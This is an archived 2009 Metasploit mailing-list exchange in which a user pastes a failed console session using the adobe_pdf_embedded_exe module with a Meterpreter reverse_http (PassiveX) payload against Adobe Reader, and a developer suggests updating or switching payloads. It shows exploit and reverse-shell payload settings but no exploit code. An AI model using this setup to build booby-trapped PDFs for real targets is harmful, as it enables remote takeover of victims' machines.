Metasploit mailing list archives

adobe_pdf_embedded_exe

From: natron at invisibledenizen.org (natron)
Date: Wed, 30 Sep 2009 13:28:19 -0500

I know passivex is currently borked, but haven't tried to run down the
issue yet (so am unsure if what you're seeing is related).  Make sure
you're running current SVN, use a different payload, and if you still
have problems let us know.

N

On Wed, Sep 30, 2009 at 12:05 PM, Aczire <aczire at gmail.com> wrote:

Any ideas? Thanks ahead?.





msf exploit(adobe_pdf_embedded_exe) > show options



Module options:



?? Name??????? Current Setting? Required? Description

?? ----??????? ---------------? --------? -----------

?? EXENAME???? out.exe????????? no??????? The Name of payload exe.

?? FILENAME??? c:\out.pdf?????? no??????? The output filename.

?? INFILENAME? c:\msf.pdf?????? no??????? The Input PDF filename.

?? OUTPUTPATH? c:\blue\???????? no??????? The location to output the file.





Payload options (windows/meterpreter/reverse_http):



?? Name?????? Current Setting?????????????????????? Required? Description

?? ----?????? ---------------?????????????????????? --------? -----------

?? EXITFUNC?? thread??????????????????????????????? yes?????? Exit
technique: seh, thread, process

?? PXAXCLSID? B3AC7307-FEAE-4e43-B2D6-161E68ABA838? yes?????? ActiveX CLSID

?? PXAXVER??? -1,-1,-1,-1?????????????????????????? yes?????? ActiveX DLL
Version

?? PXHOST???? localhost???????????????????????????? yes?????? The local HTTP
listener hostname

?? PXPORT???? 80??????????????????????????????????? yes?????? The local HTTP
listener port

?? PXURI????? /eHZnaV7UeheWLSNbZ3nFwi9GoL1sb7nf???? no??????? The URI root
for requests





Exploit target:



?? Id? Name

?? --? ----

?? 0?? Adobe Reader v8.x, v9.x (Windows XP SP3 English)





msf exploit(adobe_pdf_embedded_exe) > exploit

[*] PassiveX listener started.

[*] Reading in 'c:\msf.pdf'...

[*] Parseing 'c:\msf.pdf'...

[-] Exploit failed: undefined method `+' for nil:NilClass

[*] PassiveX listener stopped.

[*] Exploit completed, but no session was created.







Best Regards,

Aczire.

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

Current thread:

adobe_pdf_embedded_exe Moshe Ben Simon (Sep 26)
- adobe_pdf_embedded_exe Jerome Athias (Sep 26)
- <Possible follow-ups>
- adobe_pdf_embedded_exe Moshe Ben Simon (Sep 26)
  - adobe_pdf_embedded_exe HD Moore (Sep 26)
- adobe_pdf_embedded_exe Aczire (Sep 30)
  - adobe_pdf_embedded_exe natron (Sep 30)